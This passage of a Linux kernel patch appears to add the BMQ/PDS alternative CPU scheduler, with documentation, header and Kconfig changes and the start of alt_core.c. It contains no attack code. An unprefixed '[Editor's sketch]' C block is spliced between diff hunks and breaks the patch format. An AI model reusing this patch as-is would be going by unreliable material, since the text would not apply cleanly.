++runs the first task from the head of that queue. The per-CPU idle task is
++also in the run queue, so the scheduler can always find a task to run from
++its own run queue.
++
++Each task is assigned the same timeslice (default 4 ms) when it is picked to
++start running. A task is reinserted at the end of the appropriate priority
++queue when it uses up its whole timeslice. When the scheduler selects a new
++task from the priority queue it sets the CPU's preemption timer for the
++remainder of the previous timeslice. When that timer fires the scheduler stops
++executing that task, selects another task and starts over again.
++
++If a task blocks waiting for a shared resource then it's taken out of its
++priority queue and is placed in a wait queue for the shared resource. When it
++is unblocked it will be reinserted in the appropriate priority queue of an
++eligible CPU.
++
++Task policy
++-----------
++
++BMQ supports the DEADLINE, FIFO, RR, NORMAL, BATCH and IDLE task policies,
++like the mainline CFS scheduler. But BMQ is heavily optimized for non-rt
++tasks, that is, NORMAL/BATCH/IDLE policy tasks. Below are the implementation
++details of each policy.
++
++DEADLINE
++	It is squashed as priority 0 FIFO task.
++
++FIFO/RR
++	All RT tasks share one single priority queue in the BMQ run queue design.
++The complexity of the insert operation is O(n). BMQ is not designed for
++systems that run mostly rt policy tasks.
++
++NORMAL/BATCH/IDLE
++	BATCH and IDLE tasks are treated as the same policy. They compete for CPU
++with NORMAL policy tasks, but they never boost. To control the priority of
++NORMAL/BATCH/IDLE tasks, simply use the nice level.
++
++ISO
++	ISO policy is not supported in BMQ. Please use nice level -20 NORMAL policy
++task instead.
++
++Priority management
++-------------------
++
++RT tasks have priorities from 0-99. For non-rt tasks, two different factors
++are used to determine the effective priority of a task; the effective
++priority is what determines which queue the task will be in.
++
++The first factor is simply the task's static priority, which is assigned from
++the task's nice level: [-20, 19] from userland's point of view and [0, 39]
++internally.
++
++The second factor is the priority boost. This is a value bounded to
++[-MAX_PRIORITY_ADJ, MAX_PRIORITY_ADJ] that is used to offset the base
++priority; it is modified in the following cases:
++
++* When a thread has used up its entire timeslice, its boost is always
++deboosted by increasing it by one.
++* When a thread gives up cpu control (voluntarily or not) to reschedule, and
++its switch-in time (time since it was last switched in and run) is below the
++threshold based on its priority boost, its boost is boosted by decreasing it
++by one, but it is capped at 0 (it won't go negative).
++
++The intent in this system is to ensure that interactive threads are serviced
++quickly. These are usually the threads that interact directly with the user
++and cause user-perceivable latency. These threads usually do little work and
++spend most of their time blocked awaiting another user event. So they get the
++priority boost from unblocking while background threads that do most of the
++processing receive the priority penalty for using their entire timeslice.
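
[Editor's sketch] To make the two factors above concrete, here is a hypothetical illustration of how an effective priority could be derived from them. This is invented code, not taken from alt_core.c; only MAX_PRIORITY_ADJ and the internal [0, 39] static range come from the text above:

#include <stdio.h>

#define MAX_PRIORITY_ADJ 7

static int effective_prio(int static_prio, int boost_prio)
{
	if (boost_prio < -MAX_PRIORITY_ADJ)
		boost_prio = -MAX_PRIORITY_ADJ;
	if (boost_prio > MAX_PRIORITY_ADJ)
		boost_prio = MAX_PRIORITY_ADJ;
	return static_prio + boost_prio;	/* lower value runs sooner */
}

int main(void)
{
	/* nice 0 corresponds to static priority 20 in the internal range */
	printf("interactive task: %d\n", effective_prio(20, -3)); /* 17 */
	printf("cpu-bound task:   %d\n", effective_prio(20, +3)); /* 23 */
	return 0;
}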
+diff --git a/fs/proc/base.c b/fs/proc/base.c
+index 9e479d7d202b..2a8530021b23 100644
+--- a/fs/proc/base.c
++++ b/fs/proc/base.c
+@@ -479,7 +479,7 @@ static int proc_pid_schedstat(struct seq_file *m, struct pid_namespace *ns,
+ 		seq_puts(m, "0 0 0\n");
+ 	else
+ 		seq_printf(m, "%llu %llu %lu\n",
+-		   (unsigned long long)task->se.sum_exec_runtime,
++		   (unsigned long long)tsk_seruntime(task),
+ 		   (unsigned long long)task->sched_info.run_delay,
+ 		   task->sched_info.pcount);
+ 
+diff --git a/include/asm-generic/resource.h b/include/asm-generic/resource.h
+index 8874f681b056..59eb72bf7d5f 100644
+--- a/include/asm-generic/resource.h
++++ b/include/asm-generic/resource.h
+@@ -23,7 +23,7 @@
+ 	[RLIMIT_LOCKS]		= {  RLIM_INFINITY,  RLIM_INFINITY },	\
+ 	[RLIMIT_SIGPENDING]	= { 		0,	       0 },	\
+ 	[RLIMIT_MSGQUEUE]	= {   MQ_BYTES_MAX,   MQ_BYTES_MAX },	\
+-	[RLIMIT_NICE]		= { 0, 0 },				\
++	[RLIMIT_NICE]		= { 30, 30 },				\
+ 	[RLIMIT_RTPRIO]		= { 0, 0 },				\
+ 	[RLIMIT_RTTIME]		= {  RLIM_INFINITY,  RLIM_INFINITY },	\
+ }
+diff --git a/include/linux/sched.h b/include/linux/sched.h
+index ffb6eb55cd13..2e730a59caa2 100644
+--- a/include/linux/sched.h
++++ b/include/linux/sched.h
+@@ -762,8 +762,14 @@ struct task_struct {
+ 	unsigned int			ptrace;
+ 
+ #ifdef CONFIG_SMP
+-	int				on_cpu;
+ 	struct __call_single_node	wake_entry;
++#endif
++#if defined(CONFIG_SMP) || defined(CONFIG_SCHED_ALT)
++	int				on_cpu;
++#endif
++
++#ifdef CONFIG_SMP
++#ifndef CONFIG_SCHED_ALT
+ 	unsigned int			wakee_flips;
+ 	unsigned long			wakee_flip_decay_ts;
+ 	struct task_struct		*last_wakee;
+@@ -777,6 +783,7 @@ struct task_struct {
+ 	 */
+ 	int				recent_used_cpu;
+ 	int				wake_cpu;
++#endif /* !CONFIG_SCHED_ALT */
+ #endif
+ 	int				on_rq;
+ 
+@@ -785,6 +792,20 @@ struct task_struct {
+ 	int				normal_prio;
+ 	unsigned int			rt_priority;
+ 
++#ifdef CONFIG_SCHED_ALT
++	u64				last_ran;
++	s64				time_slice;
++	int				sq_idx;
++	struct list_head		sq_node;
++#ifdef CONFIG_SCHED_BMQ
++	int				boost_prio;
++#endif /* CONFIG_SCHED_BMQ */
++#ifdef CONFIG_SCHED_PDS
++	u64				deadline;
++#endif /* CONFIG_SCHED_PDS */
++	/* sched_clock time spent running */
++	u64				sched_time;
++#else /* !CONFIG_SCHED_ALT */
+ 	struct sched_entity		se;
+ 	struct sched_rt_entity		rt;
+ 	struct sched_dl_entity		dl;
+@@ -795,6 +816,7 @@ struct task_struct {
+ 	unsigned long			core_cookie;
+ 	unsigned int			core_occupation;
+ #endif
++#endif /* !CONFIG_SCHED_ALT */
+ 
+ #ifdef CONFIG_CGROUP_SCHED
+ 	struct task_group		*sched_task_group;
+@@ -1545,6 +1567,15 @@ struct task_struct {
+ 	 */
+ };
+ 
++#ifdef CONFIG_SCHED_ALT
++#define tsk_seruntime(t)		((t)->sched_time)
++/* replace the uncertain rt_timeout with 0UL */
++#define tsk_rttimeout(t)		(0UL)
++#else /* CFS */
++#define tsk_seruntime(t)	((t)->se.sum_exec_runtime)
++#define tsk_rttimeout(t)	((t)->rt.timeout)
++#endif /* !CONFIG_SCHED_ALT */
++
+ static inline struct pid *task_pid(struct task_struct *task)
+ {
+ 	return task->thread_pid;
+diff --git a/include/linux/sched/deadline.h b/include/linux/sched/deadline.h
+index 7c83d4d5a971..fa30f98cb2be 100644
+--- a/include/linux/sched/deadline.h
++++ b/include/linux/sched/deadline.h
+@@ -1,5 +1,24 @@
+ /* SPDX-License-Identifier: GPL-2.0 */
+ 
++#ifdef CONFIG_SCHED_ALT
++
++static inline int dl_task(struct task_struct *p)
++{
++	return 0;
++}
++
++#ifdef CONFIG_SCHED_BMQ
++#define __tsk_deadline(p)	(0UL)
++#endif
++
++#ifdef CONFIG_SCHED_PDS
++#define __tsk_deadline(p)	((((u64) ((p)->prio))<<56) | (p)->deadline)
++#endif
++
++#else
++
++#define __tsk_deadline(p)	((p)->dl.deadline)
++
+ /*
+  * SCHED_DEADLINE tasks has negative priorities, reflecting
+  * the fact that any of them has higher prio than RT and
+@@ -21,6 +40,7 @@ static inline int dl_task(struct task_struct *p)
+ {
+ 	return dl_prio(p->prio);
+ }
++#endif /* CONFIG_SCHED_ALT */
+ 
+ static inline bool dl_time_before(u64 a, u64 b)
+ {
+diff --git a/include/linux/sched/prio.h b/include/linux/sched/prio.h
+index ab83d85e1183..6af9ae681116 100644
+--- a/include/linux/sched/prio.h
++++ b/include/linux/sched/prio.h
+@@ -18,6 +18,32 @@
+ #define MAX_PRIO		(MAX_RT_PRIO + NICE_WIDTH)
+ #define DEFAULT_PRIO		(MAX_RT_PRIO + NICE_WIDTH / 2)
+ 
++#ifdef CONFIG_SCHED_ALT
++
++/* Undefine MAX_PRIO and DEFAULT_PRIO */
++#undef MAX_PRIO
++#undef DEFAULT_PRIO
++
++/* +/- priority levels from the base priority */
++#ifdef CONFIG_SCHED_BMQ
++#define MAX_PRIORITY_ADJ	(7)
++
++#define MIN_NORMAL_PRIO		(MAX_RT_PRIO)
++#define MAX_PRIO		(MIN_NORMAL_PRIO + NICE_WIDTH)
++#define DEFAULT_PRIO		(MIN_NORMAL_PRIO + NICE_WIDTH / 2)
++#endif
++
++#ifdef CONFIG_SCHED_PDS
++#define MAX_PRIORITY_ADJ	(0)
++
++#define MIN_NORMAL_PRIO		(128)
++#define NORMAL_PRIO_NUM		(64)
++#define MAX_PRIO		(MIN_NORMAL_PRIO + NORMAL_PRIO_NUM)
++#define DEFAULT_PRIO		(MAX_PRIO - NICE_WIDTH / 2)
++#endif
++
++#endif /* CONFIG_SCHED_ALT */
++
+ /*
+  * Convert user-nice values [ -20 ... 0 ... 19 ]
+  * to static priority [ MAX_RT_PRIO..MAX_PRIO-1 ],
+diff --git a/include/linux/sched/rt.h b/include/linux/sched/rt.h
+index 994c25640e15..8c050a59ece1 100644
+--- a/include/linux/sched/rt.h
++++ b/include/linux/sched/rt.h
+@@ -24,8 +24,10 @@ static inline bool task_is_realtime(struct task_struct *tsk)
+ 
+ 	if (policy == SCHED_FIFO || policy == SCHED_RR)
+ 		return true;
++#ifndef CONFIG_SCHED_ALT
+ 	if (policy == SCHED_DEADLINE)
+ 		return true;
++#endif
+ 	return false;
+ }
+ 
+diff --git a/include/linux/sched/topology.h b/include/linux/sched/topology.h
+index 816df6cc444e..c8da08e18c91 100644
+--- a/include/linux/sched/topology.h
++++ b/include/linux/sched/topology.h
+@@ -234,7 +234,8 @@ static inline bool cpus_share_cache(int this_cpu, int that_cpu)
+ 
+ #endif	/* !CONFIG_SMP */
+ 
+-#if defined(CONFIG_ENERGY_MODEL) && defined(CONFIG_CPU_FREQ_GOV_SCHEDUTIL)
++#if defined(CONFIG_ENERGY_MODEL) && defined(CONFIG_CPU_FREQ_GOV_SCHEDUTIL) && \
++	!defined(CONFIG_SCHED_ALT)
+ extern void rebuild_sched_domains_energy(void);
+ #else
+ static inline void rebuild_sched_domains_energy(void)
+diff --git a/init/Kconfig b/init/Kconfig
+index 94125d3b6893..c87ba766d354 100644
+--- a/init/Kconfig
++++ b/init/Kconfig
+@@ -819,6 +819,7 @@ menu "Scheduler features"
+ config UCLAMP_TASK
+ 	bool "Enable utilization clamping for RT/FAIR tasks"
+ 	depends on CPU_FREQ_GOV_SCHEDUTIL
++	depends on !SCHED_ALT
+ 	help
+ 	  This feature enables the scheduler to track the clamped utilization
+ 	  of each CPU based on RUNNABLE tasks scheduled on that CPU.
+@@ -865,6 +866,35 @@ config UCLAMP_BUCKETS_COUNT
+ 
+ 	  If in doubt, use the default value.
+ 
++menuconfig SCHED_ALT
++	bool "Alternative CPU Schedulers"
++	default y
++	help
++	  This feature enables alternative CPU schedulers.
++
++if SCHED_ALT
++
++choice
++	prompt "Alternative CPU Scheduler"
++	default SCHED_BMQ
++
++config SCHED_BMQ
++	bool "BMQ CPU scheduler"
++	help
++	  The BitMap Queue CPU scheduler for excellent interactivity and
++	  responsiveness on the desktop and solid scalability on normal
++	  hardware and commodity servers.
++
++config SCHED_PDS
++	bool "PDS CPU scheduler"
++	help
++	  The Priority and Deadline based Skip list multiple queue CPU
++	  Scheduler.
++
++endchoice
++
++endif
++
+ endmenu
+ 
+ #
+@@ -918,6 +948,7 @@ config NUMA_BALANCING
+ 	depends on ARCH_SUPPORTS_NUMA_BALANCING
+ 	depends on !ARCH_WANT_NUMA_VARIABLE_LOCALITY
+ 	depends on SMP && NUMA && MIGRATION && !PREEMPT_RT
++	depends on !SCHED_ALT
+ 	help
+ 	  This option adds support for automatic NUMA aware memory/task placement.
+ 	  The mechanism is quite primitive and is based on migrating memory when
+@@ -1015,6 +1046,7 @@ config FAIR_GROUP_SCHED
+ 	depends on CGROUP_SCHED
+ 	default CGROUP_SCHED
+ 
++if !SCHED_ALT
+ config CFS_BANDWIDTH
+ 	bool "CPU bandwidth provisioning for FAIR_GROUP_SCHED"
+ 	depends on FAIR_GROUP_SCHED
+@@ -1037,6 +1069,7 @@ config RT_GROUP_SCHED
+ 	  realtime bandwidth for them.
+ 	  See Documentation/scheduler/sched-rt-group.rst for more information.
+ 
++endif #!SCHED_ALT
+ endif #CGROUP_SCHED
+ 
+ config UCLAMP_TASK_GROUP
+@@ -1281,6 +1314,7 @@ config CHECKPOINT_RESTORE
+ 
+ config SCHED_AUTOGROUP
+ 	bool "Automatic process group scheduling"
++	depends on !SCHED_ALT
+ 	select CGROUPS
+ 	select CGROUP_SCHED
+ 	select FAIR_GROUP_SCHED
+diff --git a/init/init_task.c b/init/init_task.c
+index ff6c4b9bfe6b..19e9c662d1a1 100644
+--- a/init/init_task.c
++++ b/init/init_task.c
+@@ -75,9 +75,15 @@ struct task_struct init_task
+ 	.stack		= init_stack,
+ 	.usage		= REFCOUNT_INIT(2),
+ 	.flags		= PF_KTHREAD,
++#ifdef CONFIG_SCHED_ALT
++	.prio		= DEFAULT_PRIO + MAX_PRIORITY_ADJ,
++	.static_prio	= DEFAULT_PRIO,
++	.normal_prio	= DEFAULT_PRIO + MAX_PRIORITY_ADJ,
++#else
+ 	.prio		= MAX_PRIO - 20,
+ 	.static_prio	= MAX_PRIO - 20,
+ 	.normal_prio	= MAX_PRIO - 20,
++#endif
+ 	.policy		= SCHED_NORMAL,
+ 	.cpus_ptr	= &init_task.cpus_mask,
+ 	.user_cpus_ptr	= NULL,
+@@ -88,6 +94,17 @@ struct task_struct init_task
+ 	.restart_block	= {
+ 		.fn = do_no_restart_syscall,
+ 	},
++#ifdef CONFIG_SCHED_ALT
++	.sq_node	= LIST_HEAD_INIT(init_task.sq_node),
++#ifdef CONFIG_SCHED_BMQ
++	.boost_prio	= 0,
++	.sq_idx		= 15,
++#endif
++#ifdef CONFIG_SCHED_PDS
++	.deadline	= 0,
++#endif
++	.time_slice	= HZ,
++#else
+ 	.se		= {
+ 		.group_node 	= LIST_HEAD_INIT(init_task.se.group_node),
+ 	},
+@@ -95,6 +112,7 @@ struct task_struct init_task
+ 		.run_list	= LIST_HEAD_INIT(init_task.rt.run_list),
+ 		.time_slice	= RR_TIMESLICE,
+ 	},
++#endif
+ 	.tasks		= LIST_HEAD_INIT(init_task.tasks),
+ #ifdef CONFIG_SMP
+ 	.pushable_tasks	= PLIST_NODE_INIT(init_task.pushable_tasks, MAX_PRIO),
+diff --git a/kernel/Kconfig.preempt b/kernel/Kconfig.preempt
+index c2f1fd95a821..41654679b1b2 100644
+--- a/kernel/Kconfig.preempt
++++ b/kernel/Kconfig.preempt
+@@ -117,7 +117,7 @@ config PREEMPT_DYNAMIC
+ 
+ config SCHED_CORE
+ 	bool "Core Scheduling for SMT"
+-	depends on SCHED_SMT
++	depends on SCHED_SMT && !SCHED_ALT
+ 	help
+ 	  This option permits Core Scheduling, a means of coordinated task
+ 	  selection across SMT siblings. When enabled -- see
+diff --git a/kernel/cgroup/cpuset.c b/kernel/cgroup/cpuset.c
+index b474289c15b8..a23224b45b03 100644
+--- a/kernel/cgroup/cpuset.c
++++ b/kernel/cgroup/cpuset.c
+@@ -787,7 +787,7 @@ static int validate_change(struct cpuset *cur, struct cpuset *trial)
+ 	return ret;
+ }
+ 
+-#ifdef CONFIG_SMP
++#if defined(CONFIG_SMP) && !defined(CONFIG_SCHED_ALT)
+ /*
+  * Helper routine for generate_sched_domains().
+  * Do cpusets a, b have overlapping effective cpus_allowed masks?
+@@ -1183,7 +1183,7 @@ static void rebuild_sched_domains_locked(void)
+ 	/* Have scheduler rebuild the domains */
+ 	partition_and_rebuild_sched_domains(ndoms, doms, attr);
+ }
+-#else /* !CONFIG_SMP */
++#else /* !CONFIG_SMP || CONFIG_SCHED_ALT */
+ static void rebuild_sched_domains_locked(void)
+ {
+ }
+diff --git a/kernel/delayacct.c b/kernel/delayacct.c
+index e39cb696cfbd..463423572e09 100644
+--- a/kernel/delayacct.c
++++ b/kernel/delayacct.c
+@@ -150,7 +150,7 @@ int delayacct_add_tsk(struct taskstats *d, struct task_struct *tsk)
+ 	 */
+ 	t1 = tsk->sched_info.pcount;
+ 	t2 = tsk->sched_info.run_delay;
+-	t3 = tsk->se.sum_exec_runtime;
++	t3 = tsk_seruntime(tsk);
+ 
+ 	d->cpu_count += t1;
+ 
+diff --git a/kernel/exit.c b/kernel/exit.c
+index 35e0a31a0315..64e368441cf4 100644
+--- a/kernel/exit.c
++++ b/kernel/exit.c
+@@ -125,7 +125,7 @@ static void __exit_signal(struct task_struct *tsk)
+ 			sig->curr_target = next_thread(tsk);
+ 	}
+ 
+-	add_device_randomness((const void*) &tsk->se.sum_exec_runtime,
++	add_device_randomness((const void*) &tsk_seruntime(tsk),
+ 			      sizeof(unsigned long long));
+ 
+ 	/*
+@@ -146,7 +146,7 @@ static void __exit_signal(struct task_struct *tsk)
+ 	sig->inblock += task_io_get_inblock(tsk);
+ 	sig->oublock += task_io_get_oublock(tsk);
+ 	task_io_accounting_add(&sig->ioac, &tsk->ioac);
+-	sig->sum_sched_runtime += tsk->se.sum_exec_runtime;
++	sig->sum_sched_runtime += tsk_seruntime(tsk);
+ 	sig->nr_threads--;
+ 	__unhash_process(tsk, group_dead);
+ 	write_sequnlock(&sig->stats_lock);
+diff --git a/kernel/locking/rtmutex.c b/kernel/locking/rtmutex.c
+index 7779ee8abc2a..5b9893cdfb1b 100644
+--- a/kernel/locking/rtmutex.c
++++ b/kernel/locking/rtmutex.c
+@@ -300,21 +300,25 @@ static __always_inline void
+ waiter_update_prio(struct rt_mutex_waiter *waiter, struct task_struct *task)
+ {
+ 	waiter->prio = __waiter_prio(task);
+-	waiter->deadline = task->dl.deadline;
++	waiter->deadline = __tsk_deadline(task);
+ }
+ 
+ /*
+  * Only use with rt_mutex_waiter_{less,equal}()
+  */
+ #define task_to_waiter(p)	\
+-	&(struct rt_mutex_waiter){ .prio = __waiter_prio(p), .deadline = (p)->dl.deadline }
++	&(struct rt_mutex_waiter){ .prio = __waiter_prio(p), .deadline = __tsk_deadline(p) }
+ 
+ static __always_inline int rt_mutex_waiter_less(struct rt_mutex_waiter *left,
+ 						struct rt_mutex_waiter *right)
+ {
++#ifdef CONFIG_SCHED_PDS
++	return (left->deadline < right->deadline);
++#else
+ 	if (left->prio < right->prio)
+ 		return 1;
+ 
++#ifndef CONFIG_SCHED_BMQ
+ 	/*
+ 	 * If both waiters have dl_prio(), we check the deadlines of the
+ 	 * associated tasks.
+@@ -323,16 +327,22 @@ static __always_inline int rt_mutex_waiter_less(struct rt_mutex_waiter *left,
+ 	 */
+ 	if (dl_prio(left->prio))
+ 		return dl_time_before(left->deadline, right->deadline);
++#endif
+ 
+ 	return 0;
++#endif
+ }
+ 
+ static __always_inline int rt_mutex_waiter_equal(struct rt_mutex_waiter *left,
+ 						 struct rt_mutex_waiter *right)
+ {
++#ifdef CONFIG_SCHED_PDS
++	return (left->deadline == right->deadline);
++#else
+ 	if (left->prio != right->prio)
+ 		return 0;
+ 
++#ifndef CONFIG_SCHED_BMQ
+ 	/*
+ 	 * If both waiters have dl_prio(), we check the deadlines of the
+ 	 * associated tasks.
+@@ -341,8 +351,10 @@ static __always_inline int rt_mutex_waiter_equal(struct rt_mutex_waiter *left,
+ 	 */
+ 	if (dl_prio(left->prio))
+ 		return left->deadline == right->deadline;
++#endif
+ 
+ 	return 1;
++#endif
+ }
+ 
+ static inline bool rt_mutex_steal(struct rt_mutex_waiter *waiter,
+diff --git a/kernel/sched/Makefile b/kernel/sched/Makefile
+index 976092b7bd45..31d587c16ec1 100644
+--- a/kernel/sched/Makefile
++++ b/kernel/sched/Makefile
+@@ -28,7 +28,12 @@ endif
+ # These compilation units have roughly the same size and complexity - so their
+ # build parallelizes well and finishes roughly at once:
+ #
++ifdef CONFIG_SCHED_ALT
++obj-y += alt_core.o
++obj-$(CONFIG_SCHED_DEBUG) += alt_debug.o
++else
+ obj-y += core.o
+ obj-y += fair.o
++endif
+ obj-y += build_policy.o
+ obj-y += build_utility.o
+diff --git a/kernel/sched/alt_core.c b/kernel/sched/alt_core.c
+new file mode 100644
+index 000000000000..a9e906b229eb
+--- /dev/null
++++ b/kernel/sched/alt_core.c
+@@ -0,0 +1,7982 @@
++/*
++ *  kernel/sched/alt_core.c
++ *
++ *  Core alternative kernel scheduler code and related syscalls
++ *
++ *  Copyright (C) 1991-2002  Linus Torvalds
++ *
++ *  2009-08-13	Brainfuck deadline scheduling policy by Con Kolivas deletes
++ *		a whole lot of those previous things.
++ *  2017-09-06	Priority and Deadline based Skip list multiple queue kernel
++ *		scheduler by Alfred Chen.
++ *  2019-02-20	BMQ(BitMap Queue) kernel scheduler by Alfred Chen.
++ */
++#include <linux/sched/cputime.h>
++#include <linux/sched/debug.h>
++#include <linux/sched/isolation.h>
++#include <linux/sched/loadavg.h>
++#include <linux/sched/mm.h>
++#include <linux/sched/nohz.h>
++#include <linux/sched/stat.h>
++#include <linux/sched/wake_q.h>
++
++#include <linux/blkdev.h>
++#include <linux/context_tracking.h>
++#include <linux/cpuset.h>
++#include <linux/delayacct.h>
++#include <linux/init_task.h>
++#include <linux/kcov.h>
++#include <linux/kprobes.h>
++#include <linux/nmi.h>
++#include <linux/scs.h>
++
++#include <uapi/linux/sched/types.h>
++
++#include <asm/irq_regs.h>
++#include <asm/switch_to.h>
++
++#define CREATE_TRACE_POINTS
++#include <trace/events/sched.h>
++#undef CREATE_TRACE_POINTS
++
++#include "sched.h"
++
++#include "pelt.h"
++
++#include "../../io_uring/io-wq.h"
++#include "../smpboot.h"
++
++/*
++ * Export tracepoints that act as a bare tracehook (ie: have no trace event
++ * associated with them) to allow external modules to probe them.
++ */
++EXPORT_TRACEPOINT_SYMBOL_GPL(pelt_irq_tp);
++
++#ifdef CONFIG_SCHED_DEBUG
++#define sched_feat(x)	(1)
++/*
++ * Print a warning if need_resched is set for the given duration (if
++ * LATENCY_WARN is enabled).
++ *
++ * If sysctl_resched_latency_warn_once is set, only one warning will be shown
++ * per boot.
++ */
++__read_mostly int sysctl_resched_latency_warn_ms = 100;
++__read_mostly int sysctl_resched_latency_warn_once = 1;
++#else
++#define sched_feat(x)	(0)
++#endif /* CONFIG_SCHED_DEBUG */
++
++#define ALT_SCHED_VERSION "v6.1-r4"
++
++/* rt_prio(prio) defined in include/linux/sched/rt.h */
++#define rt_task(p)		rt_prio((p)->prio)
++#define rt_policy(policy)	((policy) == SCHED_FIFO || (policy) == SCHED_RR)
++#define task_has_rt_policy(p)	(rt_policy((p)->policy))
++
++#define STOP_PRIO		(MAX_RT_PRIO - 1)
++
++/* Default time slice is 4ms, can be set via kernel parameter "sched_timeslice" */
++u64 sched_timeslice_ns __read_mostly = (4 << 20);
++
++static inline void requeue_task(struct task_struct *p, struct rq *rq, int idx);
++
++#ifdef CONFIG_SCHED_BMQ
++#include "bmq.h"
++#endif
++#ifdef CONFIG_SCHED_PDS
++#include "pds.h"
++#endif
++
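++/*
++ * Parse the "sched_timeslice=" boot parameter.  Only 2 (ms) is accepted
++ * as an alternative; any other value silently falls back to the default
++ * of 4ms.  The "<< 20" below approximates an ms-to-ns conversion
++ * (1 << 20 ns is about 1.05ms).  E.g. boot with "sched_timeslice=2" for
++ * a 2ms slice.
++ */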
++static int __init sched_timeslice(char *str)
++{
++	int timeslice_ms;
++
++	get_option(&str, &timeslice_ms);
++	if (2 != timeslice_ms)
++		timeslice_ms = 4;
++	sched_timeslice_ns = timeslice_ms << 20;
++	sched_timeslice_imp(timeslice_ms);
++
++	return 0;
++}
++early_param("sched_timeslice", sched_timeslice);
++
++/* Reschedule if less than this much slice time is left (value in ns, roughly 100us) */
++#define RESCHED_NS		(100 << 10)
++
++/**
++ * sched_yield_type - Choose what sort of yield sched_yield will perform.
++ * 0: No yield.
++ * 1: Deboost and requeue task. (default)
++ * 2: Set rq skip task.
++ */
++int sched_yield_type __read_mostly = 1;
++
++#ifdef CONFIG_SMP
++static cpumask_t sched_rq_pending_mask ____cacheline_aligned_in_smp;
++
++DEFINE_PER_CPU(cpumask_t [NR_CPU_AFFINITY_LEVELS], sched_cpu_topo_masks);
++DEFINE_PER_CPU(cpumask_t *, sched_cpu_llc_mask);
++DEFINE_PER_CPU(cpumask_t *, sched_cpu_topo_end_mask);
++
++#ifdef CONFIG_SCHED_SMT
++DEFINE_STATIC_KEY_FALSE(sched_smt_present);
++EXPORT_SYMBOL_GPL(sched_smt_present);
++#endif
++
++/*
++ * Keep a unique ID per domain (we use the first CPU's number in the cpumask of
++ * the domain); this allows us to quickly tell if two CPUs are in the same cache
++ * domain, see cpus_share_cache().
++ */
++DEFINE_PER_CPU(int, sd_llc_id);
++#endif /* CONFIG_SMP */
++
++static DEFINE_MUTEX(sched_hotcpu_mutex);
++
++DEFINE_PER_CPU_SHARED_ALIGNED(struct rq, runqueues);
++
++#ifndef prepare_arch_switch
++# define prepare_arch_switch(next)	do { } while (0)
++#endif
++#ifndef finish_arch_post_lock_switch
++# define finish_arch_post_lock_switch()	do { } while (0)
++#endif
++
++#ifdef CONFIG_SCHED_SMT
++static cpumask_t sched_sg_idle_mask ____cacheline_aligned_in_smp;
++#endif
++static cpumask_t sched_preempt_mask[SCHED_QUEUE_BITS] ____cacheline_aligned_in_smp;
++static cpumask_t *const sched_idle_mask = &sched_preempt_mask[0];
++
++/* sched_queue related functions */
++static inline void sched_queue_init(struct sched_queue *q)
++{
++	int i;
++
++	bitmap_zero(q->bitmap, SCHED_QUEUE_BITS);
++	for (i = 0; i < SCHED_BITS; i++)
++		INIT_LIST_HEAD(&q->heads[i]);
++}
++
++/*
++ * Initialize the idle task and put it into the queue structure of rq.
++ * IMPORTANT: may be called multiple times for a single cpu.
++ */
++static inline void sched_queue_init_idle(struct sched_queue *q,
++					 struct task_struct *idle)
++{
++	idle->sq_idx = IDLE_TASK_SCHED_PRIO;
++	INIT_LIST_HEAD(&q->heads[idle->sq_idx]);
++	list_add(&idle->sq_node, &q->heads[idle->sq_idx]);
++}
++
++static inline void
++clear_recorded_preempt_mask(int pr, int low, int high, int cpu)
++{
++	if (low < pr && pr <= high)
++		cpumask_clear_cpu(cpu, sched_preempt_mask + SCHED_QUEUE_BITS - pr);
++}
++
++static inline void
++set_recorded_preempt_mask(int pr, int low, int high, int cpu)
++{
++	if (low < pr && pr <= high)
++		cpumask_set_cpu(cpu, sched_preempt_mask + SCHED_QUEUE_BITS - pr);
++}
++
++static atomic_t sched_prio_record = ATOMIC_INIT(0);
++
++/* watermark related functions */
++static inline void update_sched_preempt_mask(struct rq *rq)
++{
++	unsigned long prio = find_first_bit(rq->queue.bitmap, SCHED_QUEUE_BITS);
++	unsigned long last_prio = rq->prio;
++	int cpu, pr;
++
++	if (prio == last_prio)
++		return;
++
++	rq->prio = prio;
++	cpu = cpu_of(rq);
++	pr = atomic_read(&sched_prio_record);
++
++	if (prio < last_prio) {
++		if (IDLE_TASK_SCHED_PRIO == last_prio) {
++			cpumask_clear_cpu(cpu, sched_idle_mask);
++			last_prio -= 2;
++#ifdef CONFIG_SCHED_SMT
++			if (static_branch_likely(&sched_smt_present))
++				cpumask_andnot(&sched_sg_idle_mask,
++					       &sched_sg_idle_mask, cpu_smt_mask(cpu));
++#endif
++		}
++		clear_recorded_preempt_mask(pr, prio, last_prio, cpu);
++
++		return;
++	}
++	/* last_prio < prio */
++	if (IDLE_TASK_SCHED_PRIO == prio) {
++		cpumask_set_cpu(cpu, sched_idle_mask);
++		prio -= 2;
++#ifdef CONFIG_SCHED_SMT
++		if (static_branch_likely(&sched_smt_present)) {
++			cpumask_t tmp;
++
++			cpumask_and(&tmp, cpu_smt_mask(cpu), sched_idle_mask);
++			if (cpumask_equal(&tmp, cpu_smt_mask(cpu)))
++				cpumask_or(&sched_sg_idle_mask,
++					   &sched_sg_idle_mask, cpu_smt_mask(cpu));
++		}
++#endif
++	}
++	set_recorded_preempt_mask(pr, last_prio, prio, cpu);
++}
++
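++/*
++ * Note: only the preempt mask for the most recently recorded priority
++ * level (sched_prio_record) is kept up to date here; preempt_mask_check()
++ * rebuilds a level lazily via sched_preempt_mask_flush() when a task of a
++ * different priority queries it.
++ */
++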
++/*
++ * This routine assumes that the idle task is always in the queue.
++ */
++static inline struct task_struct *sched_rq_first_task(struct rq *rq)
++{
++	unsigned long idx = find_first_bit(rq->queue.bitmap, SCHED_QUEUE_BITS);
++	const struct list_head *head = &rq->queue.heads[sched_prio2idx(idx, rq)];
++
++	return list_first_entry(head, struct task_struct, sq_node);
++}
++
++static inline struct task_struct *
++sched_rq_next_task(struct task_struct *p, struct rq *rq)
++{
++	unsigned long idx = p->sq_idx;
++	struct list_head *head = &rq->queue.heads[idx];
++
++	if (list_is_last(&p->sq_node, head)) {
++		idx = find_next_bit(rq->queue.bitmap, SCHED_QUEUE_BITS,
++				    sched_idx2prio(idx, rq) + 1);
++		head = &rq->queue.heads[sched_prio2idx(idx, rq)];
++
++		return list_first_entry(head, struct task_struct, sq_node);
++	}
++
++	return list_next_entry(p, sq_node);
++}
++
++static inline struct task_struct *rq_runnable_task(struct rq *rq)
++{
++	struct task_struct *next = sched_rq_first_task(rq);
++
++	if (unlikely(next == rq->skip))
++		next = sched_rq_next_task(next, rq);
++
++	return next;
++}
++
++/*
++ * Serialization rules:
++ *
++ * Lock order:
++ *
